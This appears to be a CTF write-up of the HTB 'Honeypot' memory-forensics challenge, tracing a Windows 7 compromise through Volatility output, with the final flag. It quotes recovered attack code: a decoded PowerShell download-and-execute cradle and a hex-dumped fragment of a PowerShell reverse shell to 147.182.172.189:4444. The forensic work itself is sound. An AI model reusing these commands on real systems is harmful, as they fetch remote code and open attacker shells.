Skip to main content

Day 2: Honeypot

challenge description
Santa really encourages people to be at his good list but sometimes he is a bit naughty himself.
He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics
expert, can you help him identify any indications of compromise?

1. Find the full URL used to download the malware.
2. Find the malicious's process ID.
3. Find the attackers IP

Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}

For this challenge, we are provided with a raw image. Since the description reveals that it is a Windows 7 machine, it is likely a memory dump which we can inspect with volatility.

For this challenge, I have used volatility 2.

Enumeration

Basic enumeration of the memory dump reveals some details about it.

┌──(root💀kali)-[/home/kali/Desktop/volatility_2.6_lin64_standalone]
> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/media/sf_HTBShared/honeypot.raw)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82930c68L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x82931d00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2021-11-25 19:14:12 UTC+0000
Image local date and time : 2021-11-25 11:14:12 -0800

Well, it is indeed a Windows 7 machine. Let's try the usual suite of commands.

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 pstree
Volatility Foundation Volatility Framework 2.6
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x8413a940:System 4 0 76 549 2021-11-26 05:12:15 UTC+0000
. 0x84fe9c80:smss.exe 236 4 2 32 2021-11-26 05:12:15 UTC+0000
0x84f9bd28:csrss.exe 308 300 9 435 2021-11-26 05:12:16 UTC+0000
. 0x858f2bc0:conhost.exe 1684 308 2 32 2021-11-25 19:12:21 UTC+0000
0x850ba3f0:wininit.exe 348 300 3 75 2021-11-26 05:12:16 UTC+0000
. 0x856f5620:services.exe 400 348 8 225 2021-11-26 05:12:16 UTC+0000
.. 0x85c7e610:svchost.exe 2080 400 5 91 2021-11-25 19:12:22 UTC+0000
.. 0x85c54030:sppsvc.exe 1800 400 5 146 2021-11-25 19:12:22 UTC+0000
.. 0x859eaa60:vmicsvc.exe 1432 400 4 66 2021-11-25 19:12:19 UTC+0000
.. 0x85a25758:vmicsvc.exe 1540 400 6 81 2021-11-25 19:12:19 UTC+0000
.. 0x85d84b00:taskhost.exe 2784 400 11 172 2021-11-25 19:12:37 UTC+0000
.. 0x85bf9b00:wlms.exe 1956 400 4 45 2021-11-25 19:12:20 UTC+0000
.. 0x85969b00:spoolsv.exe 1208 400 14 293 2021-11-25 19:12:19 UTC+0000
.. 0x924cd3a8:svchost.exe 692 400 7 268 2021-11-25 19:12:18 UTC+0000
.. 0x858326b8:svchost.exe 572 400 11 368 2021-11-26 05:12:17 UTC+0000
... 0x84b88788:WmiPrvSE.exe 3112 572 8 119 2021-11-25 19:13:24 UTC+0000
... 0x84ada2d0:dllhost.exe 168 572 6 88 2021-11-25 19:14:13 UTC+0000
.. 0x85921030:svchost.exe 1012 400 17 331 2021-11-25 19:12:19 UTC+0000
.. 0x859ec4b8:taskhost.exe 1440 400 10 148 2021-11-25 19:12:19 UTC+0000
.. 0x858ed9d8:svchost.exe 848 400 21 464 2021-11-25 19:12:19 UTC+0000
... 0x85d8f488:dwm.exe 2844 848 5 89 2021-11-25 19:12:37 UTC+0000
... 0x85a13c60:dwm.exe 1532 848 5 85 2021-11-25 19:12:19 UTC+0000
.. 0x85d01d28:SearchIndexer. 2360 400 17 730 2021-11-25 19:12:26 UTC+0000
... 0x85d3a260:SearchFilterHo 2460 2360 6 95 2021-11-25 19:12:26 UTC+0000
... 0x85d36d28:SearchProtocol 2440 2360 8 328 2021-11-25 19:12:26 UTC+0000
.. 0x85a42030:svchost.exe 1620 400 14 276 2021-11-25 19:12:19 UTC+0000
.. 0x859d7488:vmicsvc.exe 1376 400 8 103 2021-11-25 19:12:19 UTC+0000
.. 0x841e6470:cygrunsrv.exe 1872 400 6 100 2021-11-25 19:12:20 UTC+0000
... 0x858cad28:cygrunsrv.exe 1612 1872 0 ------ 2021-11-25 19:12:21 UTC+0000
.... 0x858d5d28:sshd.exe 1676 1612 4 100 2021-11-25 19:12:21 UTC+0000
.. 0x859ae030:svchost.exe 1252 400 20 324 2021-11-25 19:12:19 UTC+0000
.. 0x8593c260:svchost.exe 1084 400 16 396 2021-11-25 19:12:19 UTC+0000
.. 0x85819700:svchost.exe 744 400 17 353 2021-11-25 19:12:18 UTC+0000
.. 0x859de428:vmicsvc.exe 1396 400 7 108 2021-11-25 19:12:19 UTC+0000
.. 0x859f88b8:vmicsvc.exe 1504 400 5 80 2021-11-25 19:12:19 UTC+0000
.. 0x858f8548:svchost.exe 888 400 41 902 2021-11-25 19:12:19 UTC+0000
.. 0x85899390:VBoxService.ex 636 400 14 123 2021-11-26 05:12:17 UTC+0000
. 0x85702590:lsass.exe 408 348 7 615 2021-11-26 05:12:16 UTC+0000
. 0x856fbd28:lsm.exe 416 348 10 171 2021-11-26 05:12:16 UTC+0000
0x85d91498:explorer.exe 2856 2836 27 700 2021-11-25 19:12:38 UTC+0000
. 0x84bee280:DumpIt.exe 2924 2856 2 37 2021-11-25 19:14:10 UTC+0000
. 0x84b3ed28:VBoxTray.exe 3504 2856 15 145 2021-11-25 19:12:46 UTC+0000
. 0x84bafc60:iexplore.exe 3324 2856 18 434 2021-11-25 19:13:31 UTC+0000
.. 0x856aa9b8:iexplore.exe 3344 3324 26 641 2021-11-25 19:13:31 UTC+0000
. 0x85dacd28:regsvr32.exe 3108 2856 0 ------ 2021-11-25 19:12:38 UTC+0000
0x8420dd28:powershell.exe 2700 3720 13 444 2021-11-25 19:13:50 UTC+0000
. 0x85d8db00:whoami.exe 4028 2700 0 ------ 2021-11-25 19:14:01 UTC+0000
. 0x84289030:HOSTNAME.EXE 4036 2700 0 ------ 2021-11-25 19:14:01 UTC+0000
0x85a1ab00:explorer.exe 1556 1512 25 587 2021-11-25 19:12:19 UTC+0000
. 0x85a6d6f8:VBoxTray.exe 1716 1556 16 147 2021-11-25 19:12:20 UTC+0000
0x85873728:winlogon.exe 2644 2604 6 119 2021-11-25 19:12:33 UTC+0000
0x85d16d28:csrss.exe 2616 2604 11 291 2021-11-25 19:12:33 UTC+0000
. 0x851733c8:conhost.exe 3732 2616 2 50 2021-11-25 19:13:50 UTC+0000
. 0x84b046c0:conhost.exe 2920 2616 2 50 2021-11-25 19:14:10 UTC+0000
0x859f4398:csrss.exe 360 340 7 159 2021-11-26 05:12:16 UTC+0000
0x85147d28:winlogon.exe 496 340 4 111 2021-11-26 05:12:17 UTC+0000

Hmmm... The things which stand out are iexplore.exe and powershell.exe. Let's start with iexplore.exe. Luckily, volatility has a neat function to check Internet history!

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 iehistory

Download link

Ooh! Some files being downloaded as an update? Sounds suspicious. hta files are also commonly exploited in Internet Explorer to run Powershell scripts.

While we can do a memory dump of the powershell executable, let's try seeing what commands are typed.

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 cmdline

Powershell commands

Looks suspicious. We can base64 decode it.

┌──(root💀kali)-[/home/kali/Desktop/volatility_2.6_lin64_standalone]
└─# echo aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA== | base64 -d
iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))

Well. Now it's confirmed that the powershell script is used to download even more stuff... We can use the PID identified for part 2 of the flag.

Surely, the powershell script will lead to connection to a C2 server? Let's verify it.

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 netscan
Volatility Foundation Volatility Framework 2.6
Offset(P) Proto Local Address Foreign Address State Pid Owner Created
0x23d04218 TCPv4 0.0.0.0:49155 0.0.0.0:0 LISTENING 400 services.exe
0x23d04218 TCPv6 :::49155 :::0 LISTENING 400 services.exe
0x2554b460 TCPv4 10.0.2.15:49226 93.184.220.29:80 ESTABLISHED -1
0x261e9d30 TCPv4 10.0.2.15:49228 172.67.177.22:443 ESTABLISHED -1
0x3e22f008 UDPv4 0.0.0.0:0 *:* 2080 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e22f008 UDPv6 :::0 *:* 2080 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e24c588 UDPv4 0.0.0.0:0 *:* 2080 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e281368 UDPv4 10.0.2.15:138 *:* 4 System 2021-11-25 19:12:23 UTC+0000
0x3e2a29b8 UDPv4 0.0.0.0:0 *:* 1084 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e2a29b8 UDPv6 :::0 *:* 1084 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e2a6448 UDPv4 0.0.0.0:5355 *:* 1084 svchost.exe 2021-11-25 19:12:26 UTC+0000
0x3e354618 UDPv6 fe80::256b:4013:4140:453f:546 *:* 744 svchost.exe 2021-11-25 19:12:31 UTC+0000
0x3e3b0c70 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3e5e4f50 UDPv4 0.0.0.0:5355 *:* 1084 svchost.exe 2021-11-25 19:12:26 UTC+0000
0x3e5e4f50 UDPv6 :::5355 *:* 1084 svchost.exe 2021-11-25 19:12:26 UTC+0000
0x3e630008 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3e630008 UDPv6 :::0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3e238300 TCPv4 0.0.0.0:445 0.0.0.0:0 LISTENING 4 System
0x3e238300 TCPv6 :::445 :::0 LISTENING 4 System
0x3e2b5b88 TCPv4 10.0.2.15:139 0.0.0.0:0 LISTENING 4 System
0x3e5f77a0 TCPv4 0.0.0.0:22 0.0.0.0:0 LISTENING 1676 sshd.exe
0x3e619578 TCPv4 0.0.0.0:49152 0.0.0.0:0 LISTENING 348 wininit.exe
0x3e619578 TCPv6 :::49152 :::0 LISTENING 348 wininit.exe
0x3e619cc0 TCPv4 0.0.0.0:49152 0.0.0.0:0 LISTENING 348 wininit.exe
0x3e630a20 TCPv4 0.0.0.0:49156 0.0.0.0:0 LISTENING 408 lsass.exe
0x3e630a20 TCPv6 :::49156 :::0 LISTENING 408 lsass.exe
0x3e648508 TCPv4 0.0.0.0:49153 0.0.0.0:0 LISTENING 744 svchost.exe
0x3e648508 TCPv6 :::49153 :::0 LISTENING 744 svchost.exe
0x3e6b92c0 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 692 svchost.exe
0x3e6b92c0 TCPv6 :::135 :::0 LISTENING 692 svchost.exe
0x3e6b9910 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 692 svchost.exe
0x3e6f0bd8 TCPv4 0.0.0.0:49153 0.0.0.0:0 LISTENING 744 svchost.exe
0x3e75f8e0 TCPv4 0.0.0.0:49154 0.0.0.0:0 LISTENING 888 svchost.exe
0x3e762a40 TCPv4 0.0.0.0:49155 0.0.0.0:0 LISTENING 400 services.exe
0x3e7686e8 TCPv4 0.0.0.0:49154 0.0.0.0:0 LISTENING 888 svchost.exe
0x3e7686e8 TCPv6 :::49154 :::0 LISTENING 888 svchost.exe
0x3e2e9cc0 TCPv4 10.0.2.15:49221 212.205.126.106:443 ESTABLISHED -1
0x3ed036c8 UDPv4 10.0.2.15:137 *:* 4 System 2021-11-25 19:12:23 UTC+0000
0x3e8611f0 TCPv4 0.0.0.0:22 0.0.0.0:0 LISTENING 1676 sshd.exe
0x3e8611f0 TCPv6 :::22 :::0 LISTENING 1676 sshd.exe
0x3e9be828 TCPv4 0.0.0.0:49156 0.0.0.0:0 LISTENING 408 lsass.exe
0x3ee98d80 TCPv4 10.0.2.15:49229 147.182.172.189:4444 ESTABLISHED -1
0x3f1b0df8 TCPv4 10.0.2.15:49216 212.205.126.106:443 ESTABLISHED -1
0x3f2cff50 UDPv4 0.0.0.0:0 *:* 261576 ?? 2021-11-25 19:13:04 UTC+0000
0x3f2cff50 UDPv6 :::0 *:* 261576 ?? 2021-11-25 19:13:04 UTC+0000
0x3f4d7378 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3f4dad28 UDPv4 127.0.0.1:58426 *:* 3344 iexplore.exe 2021-11-25 19:13:31 UTC+0000
0x3f520ab8 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3f520ab8 UDPv6 :::0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3f546de8 UDPv4 0.0.0.0:0 *:* 636 VBoxService.ex 2021-11-25 19:14:14 UTC+0000
0x3f225df8 TCPv4 10.0.2.15:49222 212.205.126.106:443 ESTABLISHED -1
0x3f547008 TCPv4 10.0.2.15:49220 212.205.126.106:443 ESTABLISHED -1
0x3f561438 TCPv4 10.0.2.15:49215 204.79.197.203:443 ESTABLISHED -1
0x3f57c438 TCPv4 10.0.2.15:49218 95.100.210.141:443 ESTABLISHED -1
0x3f58b4c8 TCPv4 10.0.2.15:49217 212.205.126.106:443 ESTABLISHED -1
0x3f58c748 TCPv4 10.0.2.15:49223 212.205.126.106:443 ESTABLISHED -1
0x3f58e9d8 TCPv4 10.0.2.15:49225 172.67.177.22:443 ESTABLISHED -1
0x3f5c6df8 TCPv4 10.0.2.15:49219 95.100.210.141:443 ESTABLISHED -1

Port 4444? Is that the attacker's IP and port? Let's do a scan with Yara.

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 yarascan -Y "147.182.172.189"
Volatility Foundation Volatility Framework 2.6
Rule: r1
Owner: Process powershell.exe Pid 2700
0x01ed23cb 31 34 37 2e 31 38 32 2e 31 37 32 2e 31 38 39 27 147.182.172.189'
0x01ed23db 2c 34 34 34 34 29 3b 24 73 74 72 65 61 6d 20 3d ,4444);$stream.=
0x01ed23eb 20 24 63 6c 69 65 6e 74 2e 47 65 74 53 74 72 65 .$client.GetStre
0x01ed23fb 61 6d 28 29 3b 5b 62 79 74 65 5b 5d 5d 24 62 79 am();[byte[]]$by
0x01ed240b 74 65 73 20 3d 20 30 2e 2e 36 35 35 33 35 7c 25 tes.=.0..65535|%
0x01ed241b 7b 30 7d 3b 77 68 69 6c 65 28 28 24 69 20 3d 20 {0};while(($i.=.
0x01ed242b 24 73 74 72 65 61 6d 2e 52 65 61 64 28 24 62 79 $stream.Read($by
0x01ed243b 74 65 73 2c 20 30 2c 20 24 62 79 74 65 73 2e 4c tes,.0,.$bytes.L
0x01ed244b 65 6e 67 74 68 29 29 20 2d 6e 65 20 30 29 7b 3b ength)).-ne.0){;
0x01ed245b 24 64 61 74 61 20 3d 20 28 4e 65 77 2d 4f 62 6a $data.=.(New-Obj
0x01ed246b 65 63 74 20 2d 54 79 70 65 4e 61 6d 65 20 53 79 ect.-TypeName.Sy
0x01ed247b 73 74 65 6d 2e 54 65 78 74 2e 41 53 43 49 49 45 stem.Text.ASCIIE
0x01ed248b 6e 63 6f 64 69 6e 67 29 2e 47 65 74 53 74 72 69 ncoding).GetStri
0x01ed249b 6e 67 28 24 62 79 74 65 73 2c 30 2c 20 24 69 29 ng($bytes,0,.$i)
0x01ed24ab 3b 24 73 65 6e 64 62 61 63 6b 20 3d 20 28 69 65 ;$sendback.=.(ie
0x01ed24bb 78 20 24 64 61 74 61 20 32 3e 26 31 20 7c 20 4f x.$data.2>&1.|.O

Bingo! Now, we have to piece together everything and submit the flag.

echo -n "https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189" | md5sum

Flag

HTB{969b934d7396d043a50a37b70e1e010a}